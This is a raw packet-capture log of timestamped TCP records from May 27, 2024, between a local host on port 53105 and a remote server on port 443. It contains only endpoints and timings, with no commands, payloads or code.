                                                            May 27, 2024 15:24:37.368861914 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.368885040 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.368906975 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.368921041 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.368940115 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.371995926 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.372049093 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.372071981 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.372097015 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.372111082 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.372133970 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.380795956 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.380840063 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.380863905 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.380882978 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.380903959 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.380917072 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.390218019 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.390233994 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.390281916 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.390302896 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.390322924 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.390341997 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.397730112 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.397749901 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.397790909 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.397814989 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.397840023 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.397849083 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.406950951 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.406965971 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.407015085 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.407036066 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.407071114 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.418387890 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.418404102 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.418442011 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.418462038 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.418494940 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.418510914 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.436547995 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.436567068 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.436608076 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.436630964 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.436642885 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.436784029 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.454397917 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.454420090 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.454485893 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.454504013 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.454544067 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.459502935 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.459518909 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.459556103 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.459570885 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.459599018 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.459615946 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.467850924 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.467868090 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.467926979 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.467941046 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.467976093 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.477387905 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.477406979 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.477448940 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.477463007 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.477489948 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.477509975 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.485236883 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.485255003 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.485340118 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.485351086 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.485385895 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.494318962 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.494338989 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.494409084 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.494421005 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.494453907 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.510910988 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.510931015 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.510973930 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.510986090 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.511023998 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.511030912 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.523578882 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.523597956 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.523659945 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.523673058 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.523713112 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.545913935 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.545939922 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.545990944 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.546005964 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.546037912 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.546060085 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.546760082 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.546778917 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.546813011 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.546818018 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.546845913 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.546861887 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.554588079 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.554614067 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.554668903 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.554682016 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.554718018 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.564347982 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.564367056 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.564424992 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.564435959 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.564471960 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.571999073 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.572017908 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.572073936 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.572082043 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.572197914 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.587002039 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.587019920 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.587064981 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.587074995 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.587105989 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.598191977 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.598222017 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.598262072 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.598269939 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.598300934 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.598319054 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.610585928 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.610608101 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.610662937 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.610671997 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.610718012 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.636800051 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.636821985 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.636883020 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.636894941 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.636924982 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.636938095 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.638047934 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.638067007 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.638101101 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.638106108 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.638128996 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.638145924 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.641681910 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.641697884 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.641761065 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.641768932 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.641798019 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.651233912 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.651257992 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.651323080 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.651345968 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.651367903 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.651391983 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.658965111 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.658983946 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.659024000 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.659037113 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.659061909 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.659080029 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.673615932 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.673631907 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.673667908 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.673681974 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.673707008 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.673723936 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.684673071 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.684715986 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.684732914 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.684743881 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.684772015 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.684787989 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.697556973 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.697607994 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.697654009 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.697664976 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.697710991 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.724406958 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.724455118 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.724492073 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.724507093 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.724541903 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.724560976 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.724997044 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.725035906 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.725061893 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.725069046 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.725099087 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.725111961 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.728809118 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.728853941 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.728882074 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.728892088 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.728929996 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.738274097 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.738301039 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.738344908 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.738356113 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.738382101 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.738404036 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.746104956 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.746148109 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.746207952 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.746216059 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.746256113 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.760915995 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.760982037 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.761002064 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.761012077 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.761051893 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.771878004 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.771903038 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.771944046 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.771953106 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.771980047 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.771997929 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.784534931 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.784554005 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.784609079 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.784625053 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.784657001 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.811711073 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.811728954 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.811808109 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.811816931 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.811849117 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.812154055 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.812195063 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.812205076 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.812210083 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.812238932 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.812257051 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.815572977 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.815587997 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.815637112 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.815643072 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.815691948 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.825167894 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.825186014 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.825241089 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.825247049 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.825297117 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.832930088 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.832946062 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.833008051 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.833015919 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.833050966 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.847959042 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.848021984 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.848053932 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.848059893 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.848069906 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.848108053 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.859285116 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.859337091 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.859369993 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.859378099 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.859407902 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.859428883 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.871833086 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.871877909 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.871893883 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.871907949 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.871918917 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.871963024 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.898926973 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.898973942 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.899012089 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.899023056 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.899065018 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.899279118 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.899318933 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.899350882 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.899357080 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.899380922 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.899394035 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.902823925 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.902863026 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.902889967 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.902894974 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.902921915 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.902939081 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.912426949 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.912472963 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.912492990 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.912499905 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.912539005 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.921628952 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.921689034 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.921716928 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.921722889 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.921768904 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.935398102 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.935415983 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.935450077 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.935467005 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.935491085 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.935511112 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.946275949 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.946294069 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.946393013 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.946403980 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.946444988 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.958789110 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.958805084 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.958865881 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.958872080 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.958921909 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.986246109 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.986262083 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.986306906 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.986313105 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.986351967 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.986475945 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.986495972 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.986526012 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.986531019 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.986562014 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.986581087 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.989721060 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.989736080 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.989768982 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.989773989 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.989818096 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.999743938 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.999759912 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.999809980 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.999815941 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:37.999846935 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:37.999866009 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:38.007757902 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:38.007780075 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:38.007826090 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:38.007832050 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:38.007869005 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:38.007889032 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:38.022852898 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:38.022874117 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:38.022918940 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:38.022924900 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:38.022972107 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:38.022988081 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:38.033240080 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:38.033257008 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:38.033337116 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:38.033341885 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:38.033379078 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:38.045912027 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:38.045928001 CEST4435310537.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:38.045970917 CEST53105443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:38.045977116 CEST4435310537.27.34.12192.168.2.8
